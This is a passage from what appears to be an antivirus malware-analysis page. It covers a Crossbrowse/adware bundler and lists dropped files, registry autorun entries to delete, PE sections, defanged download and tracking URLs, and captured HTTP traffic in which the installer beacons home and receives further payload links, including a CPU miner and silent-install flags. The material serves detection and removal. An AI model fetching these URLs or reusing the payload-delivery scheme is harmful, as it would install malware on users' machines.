    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\agoda.ico (1921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\setup.exe (37305 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\youtube.ico (3913 bytes)
    %WinDir%\Tasks\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.job (1668 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nfl.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_translate.ico (1592 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\etsy.ico (601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ikea.ico (601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\imdb.ico (601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\weather_channel.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\imdb.ico (2993 bytes)
    %WinDir%\Tasks\Crossbrowse.job (1982 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_search.ico (5593 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\booking.com.ico (1601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nba.ico (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\huffingtonpost.ico (1909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\9gag.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\netflix.ico (1909 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\chrome.dat (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\pinterest.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_news.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\target.ico (1909 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\pinterest.ico (39 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\cnn.ico (45 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yandex.ico (35 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\cnn.ico (1601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\hotels.com.ico (47 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nfl.ico (56 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\amazon.ico (601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\search.ico (57 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\espn.ico (36 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_news.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\priceline.ico (1913 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail_live_msn.ico (38 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ted.ico (1913 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yelp.ico (42 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\utility.exe (14022 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\tumblr.ico (1592 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\expedia.ico (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bbc.ico (1588 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\groupom.ico (601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\netflix.ico (51 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\twitter.ico (1588 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\twitter.ico (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_finance.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\kayak.com.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\chrome.packed.7z (1402273 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tripadvisor.ico (58 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\kayak.com.ico (47 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\agoda.ico (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\mail_live_msn.ico (1592 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bbc.ico (35 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\weather_channel.ico (5593 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\search.ico (1917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\forbes.ico (1592 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\msn.ico (36 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo.ico (39 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ted.ico (57 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].002 (3959285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].003 (3959285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\A56681B7-BD04-4C06-AEBF-AC8A28A2118A\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.exe (14022 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].001 (3959285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\mail.ru.ico (1909 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\youtube.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].004 (3959285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].005 (3959285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\espn.ico (1588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\msn.ico (1588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (306422 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\linkedin.ico (1592 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gmail.ico (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\reddit.ico (1917 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\facebook.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yelp.ico (1597 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\9gag.ico (56 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\target.ico (50 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\theguardian.ico (42 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_finance.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\theguardian.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_mail.ico (1913 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nytimes.ico (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\walmart.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\amazon.ico (2993 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gizmodo.ico (601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\wikipedia.ico (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ebay.ico (1913 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail.ru.ico (49 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\walmart.ico (48 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\icon.json (9 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_translate.ico (38 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\etsy.ico (3913 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_search.ico (601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ebay.ico (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\wikipedia.ico (1913 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\priceline.ico (53 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nba.ico (1601 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\linkedin.ico (37 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bestbuy.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\gizmodo.ico (2993 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_mail.ico (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bestbuy.ico (3913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yandex.ico (1588 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\forbes.ico (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo.ico (1592 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\huffingtonpost.ico (49 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tumblr.ico (40 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\reddit.ico (60 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_plus.ico (1921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\groupom.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nytimes.ico (1921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\hotels.com.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\gmail.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\icon.json (21 bytes)
    %Program Files%\Crossbrowse\Crossbrowse\Application\Icons\booking.com.ico (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bing.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjE.tmp (7695 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa3B.tmp (43 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu3A.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu39.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm25.tmp (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_CPUminer[1].exe (7288 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "upgmsd_re_005010077.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe -runhelper"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "gmsd_re_005010077" = "%Program Files%\gmsd_re_005010077\gmsd_re_005010077.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United States)

Company Name: Product Name: Product Version: 1.0.0.1Legal Copyright: Copyright 2013Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.1File Description: Comments: Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409623130235524.448410bc2ffd32265a08d72b795b18265828d
.rdata28672449646083.59163f179218a059068529bdb4637ef5fa28e
.data3686411048810243.26405975304d6dd6c4a4f076b15511e2bbbc0
.ndata147456805683200d41d8cd98f00b204e9800998ecf8427e
.rsrc820428817160174084.1088541d461b626b10abd2322eb8721b1a8ac

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 7
a5330d468717116f74e3f10c4af44ac9
19386547989c454126fa40838fe498c5
8c262eb3013302226c8ae0164083f66c
ec93fc5c36e02c2138ee1f10ff7fd9ce
f3b2b530c415d7c461ffcfbd3407a605
a66e913a6195f712096c14d0f1eef2df
2623f1cff9f274c62e3fb51d09f6d201

Network Activity

URLs

URL IP
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/54.235.132.107
hxxp://download-servers.com/SysInfo/Validate.exe95.211.210.34
hxxp://download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=95.211.210.34
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe54.239.168.38
hxxp://download-servers.com/SysInfo/validator/timer.php95.211.210.34
hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe
hxxp://ipgeoapi.com/54.225.198.126
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe54.239.168.31
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=3&rnd=3075
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=106&crtnm=OralTeams&rnd=2620
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=5890
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=8163
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=6404
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.004
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.001
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.003
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.002
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.005
hxxp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe54.239.168.88
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1711
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=1250
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/Bundle_CPUminer.exe
hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US37.187.146.35
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_INI94.23.40.227
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=3154
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=6008
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=4&rnd=6761
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi37.187.146.35
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc188.165.216.144
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_F1194.23.40.227
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_FIN94.23.40.227
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_COUNT194.23.40.227
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_DCOUNT194.23.40.227
hxxp://s3-website-us-east-1.amazonaws.com/setup_362.exe
hxxp://djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800
hxxp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe54.239.168.192
hxxp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPXN0YXJ0byZldmVudD0xJnNpZD02NjYmbWFjPTc3Nw==
hxxp://installer.afsbdfgds.net/installer.php?id=800&env=2&setup_version=42.4&srcid=&dbb=ZHNwdHRjc3B4dGY=&pub_id=362&os=5.1&dotnet=4
hxxp://bi.afsbdfgds.net/?pageNumber=0&event=document_ready&description=window_of_setup_loaded&pub_id=362&setup_id=800
hxxp://bi.afsbdfgds.net/?pageNumber=1&event=window_close&description=user_clicked_close_button&pub_id=362&setup_id=800
hxxp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPWZpbml0byZldmVudD03JnNpZD02NjYmbWFjPTc3Nw==
hxxp://bi.afsbdfgds.net/?setup_closed&ReportAdvPath&adv_path=&pub_id=362&setup_id=800
hxxp://d10huri5h4o4a3.cloudfront.net/policyname.exe54.239.168.124
hxxp://sstatic1.histats.com/0.gif?2948573&101&101208.43.241.179
hxxp://codec13sudha.com/download.php?l4J9dw==
hxxp://cds.c5z6s5a3.hwcdn.net/VuuPC_VO2_8907.exe
hxxp://fcesneim.us/FCL_Co_Unq_remote_v5.php
hxxp://fcesneim.us/DSS_Unq_IMapplication_mon_remote.php
hxxp://cds.c5z6s5a3.hwcdn.net/os/rm/OfferScreen_12_HD_v2.zip
hxxp://cds.c5z6s5a3.hwcdn.net/os/rm/OfferScreen_460_v2.zip
hxxp://www.codec13sudha.com/download.php?l4J9dw==50.97.234.3
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=315454.231.81.122
hxxp://events.afsbdfgds.nethxxp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPWZpbml0byZldmVudD03JnNpZD02NjYmbWFjPTc3Nw==
hxxp://www.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php50.97.62.154
hxxp://installer.afsbdfgds.nethxxp://installer.afsbdfgds.net/installer.php?id=800&env=2&setup_version=42.4&srcid=&dbb=ZHNwdHRjc3B4dGY=&pub_id=362&os=5.1&dotnet=4
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.00269.16.175.42
hxxp://bi.afsbdfgds.nethxxp://bi.afsbdfgds.net/?pageNumber=0&event=document_ready&description=window_of_setup_loaded&pub_id=362&setup_id=800
hxxp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip69.16.175.10
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=106&crtnm=OralTeams&rnd=262054.231.97.210
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.00569.16.175.42
hxxp://livestatscounter.com/SysInfo/validator/timer.php50.7.133.50
hxxp://www.software-forus.com/CPUminer/Bundle_CPUminer.exe205.185.216.10
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.00369.16.175.42
hxxp://www.fcesneim.us/FCL_Co_Unq_remote_v5.php50.97.62.154
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.00469.16.175.42
hxxp://bi.afsbdfgds.nethxxp://bi.afsbdfgds.net/?pageNumber=1&event=window_close&description=user_clicked_close_button&pub_id=362&setup_id=800
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=50.7.133.50
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=125054.231.81.122
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=600854.231.81.122
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=4&rnd=676169.16.175.42
hxxp://events.afsbdfgds.nethxxp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPXN0YXJ0byZldmVudD0xJnNpZD02NjYmbWFjPTc3Nw==
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=640454.231.81.122
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.00169.16.175.42
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=171154.231.81.122
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi37.187.148.125
hxxp://secured.nmsgv.us/VuuPC_VO2_8907.exe69.16.175.10
hxxp://www.djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=80052.1.45.42
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=816354.231.81.122
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe205.185.216.10
hxxp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe54.231.9.20
hxxp://www.downloadsoup.com/thankyou.php54.243.139.119
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=3&rnd=307569.16.175.42
hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe176.31.126.133
hxxp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip69.16.175.10
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe69.16.175.42
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=589054.231.81.122
s3.amazonaws.com54.231.14.104
upd.adskyforever.com37.187.148.115

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /DSS_Unq_IMapplication_mon_remote.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.stsunsetwest.com

Content-Length: 327

Connection: Keep-Alive

Cache-Control: no-cache

from=nsis&type=Reg&mode=checker&utid=194.242.96.218_2015-09-02_02:40:01&pubid=11355&CbId=8907&BundleVersionID=IM_240914@01&subid=&mid=qGKynuZ0mukeZvxnJUBzZDYiT/aeDKox&DB="%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe" -- "%1"&arc=32&skexist=NO&avsexist=NO&advDetails=12~YES~0/460~YES~0/575~NO~4/576~NO~4/

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:40:02 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 599

Connection: close

Content-Type: text/html; charset=UTF-8

460~hXXp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0..460#RE2|InstalledBrowserExtensions\32846#PKG|NO#INT|setup.exe..12#RE2|Systweak\RegClean Pro\Version 6.1#RCMD|/verysilent#SLP|10^3#FNV|WriteINI^hXXp://dl.ourinputinfonet.com/monti/llyun/hd/setup.exe#PKG|NO#INT|rcpsetup_17970.exe..

GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1

User-Agent: gmsd_re_005010077-1.20

Host: ads.under-myscreen.be

Accept: */*

Accept-Encoding: gzip, deflate

Referer:

Cookie:

Accept-Language: en,en-US

X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03

X-OS-Ver: 5.1.2.2600

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:43 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_perl/2.0.4 Perl/v5.10.1

X-C4PC-ServerName: ads.under-myscreen.be

Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=under-myscreen.be; path=/;

Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1441175983.6129; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=under-myscreen.be; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"},{"u":0,"m":"xhamster"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"}]}},"freeze":3600,"refresh":3600,"version":116144}..0..

GET /crossbrowse/ie/106/ie.zip.002 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:16 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1431408217"

Last-Modified: Tue, 12 May 2015 05:23:37 GMT

Cache-Control: max-age=6311

Content-Length: 8076624

Content-Type: text/plain; charset=UTF-8

X-HW: 1441175957.dop017.am4.t,1441175956.cds063.am4.c

